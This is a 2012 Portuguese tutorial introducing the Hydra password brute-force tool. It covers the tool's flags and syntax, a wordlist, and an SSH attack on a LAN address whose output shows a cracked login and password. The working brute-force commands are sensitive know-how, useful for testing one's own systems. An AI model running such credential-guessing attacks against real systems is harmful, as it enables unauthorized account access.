Introdução ao Hydra - Brute-force

Publicado por Darlan da Silva Encarnação em 30/09/2012

[ Hits: 55.466 ]

5 0

Denuncie Favoritos Indicar Impressora

Introdução ao Hydra - Brute-force

Basicamente, o Hydra descobre senha através de brute-force (tentativa e erro), ele busca em wordlists, possíveis usuários/senhas e vai testando as combinações, uma a uma.

O Hydra tem suporte aos serviços Telnet, Formulário HTTP/HTTPS, SSH, MySQL, PostgreSQL, MSSQL, SMB, LDAP2 e LDAP3, FTP, SNMP, CVS,VNC, entre outros.

A ferramenta já vem toda instalada e configurada (inclusive com interface gráfica) no BackTrack, porém, caso não tenha instalado, basta fazer o download do código-fonte e compilá-la em qualquer distribuição.

Para isso, acesse: http://www.thc.org/thc-hydra

Abaixo, segue alguns parâmetros:

-R → Restaura sessões abordadas/quebradas.
-S → Conexão segura usando SSL caso seja necessário.
-s → Especifica em qual porta o Hydra vai estabelecer a conexão.

Sintaxe:

# hydra –l username –p password –t threads IP protocol
# hydra -L lista -P lista -t threads IP protocol

Explicação:

-l → Nome/login da vítima;
-L → Carrega uma lista contendo nomes/logins de vítimas (1 por linha);
-p → Especifica senha única;
-P → Carrega uma lista com senhas (1 por linha);
-e → Adiciona 'n', testa senha em branco ou adicional 's' testa user como pass;
-C → Usado para carregar um arquivo contendo usuário:senha. Formato usuário:senha equivale a - L/-P;
-M → Carrega lista de servidores alvos (1 por linha);
-o → Salva as senhas encontradas dentro do arquivo que você especificar;
-f → Faz o programa parar de trabalhar quando a senha ou usuário for encontrada[o];
-t → Limita o numero de solicitações por vez (default: 16);
-w → Define o tempo máximo em segundos para esperar resposta do servidor (default: 30s);
-v / -V → Modo verbose do programa. 'V' mostra todas tentativas.

Abaixo, segue um exemplo com o protocolo SSH:

# hydra –L /tmp/wordlist.txt -P /tmp/wordlist.txt 192.168.0.101 ssh

Ele irá efetuar um brute-force com usuários presentes na lista e com as senhas presentes na lista "wordlist.txt", no servidor cujo IP é: 192.168.0.101

Bom, abaixo segue um cat do meu "wordlist.txt":

# cat wordlist.txt

darlan
hugo
diogo
danilo
paula
rosi
1234
mudar1234
[email protected]
coracao
teste
teste123
root
root123
tux123
123tux

Saída do Hydra:

# hydra -L /tmp/wordlist.txt -P /tmp/wordlist.txt 192.168.0.101 ssh

Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2012-09-03 15:17:16
WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] 16 tasks, 1 servers, 256 login tries (l:16/p:16), ~16 tries per task
[DATA] attacking service ssh on port 22
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
[22][ssh] host: 192.168.0.101 login: darlan password: tux123 //AQUI ESTÁ!
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting